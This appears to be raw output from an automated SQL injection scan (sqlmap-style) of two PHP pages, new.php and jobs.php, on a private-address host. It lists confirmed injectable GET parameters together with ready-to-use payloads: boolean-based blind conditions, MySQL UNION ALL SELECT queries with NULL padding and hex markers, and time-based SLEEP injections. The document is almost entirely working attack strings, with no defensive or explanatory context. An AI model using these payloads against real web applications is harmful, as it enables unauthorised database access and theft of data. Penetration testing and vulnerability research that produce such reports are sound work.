http://10.206.10.113/new.php?id=2
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 5804=5804

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: id=-2391 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71656a7371,0x7a754365426850424265,0x716d686971),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=2 AND SLEEP(5)
---

http://10.206.10.113/jobs.php?j_id=1
---
Place: GET
Parameter: j_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: j_id=1 AND 6444=6444

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: j_id=-4671 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71667a6c71,0x5649685a4569774e6550,0x7178756871)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: j_id=1 AND SLEEP(5)
---

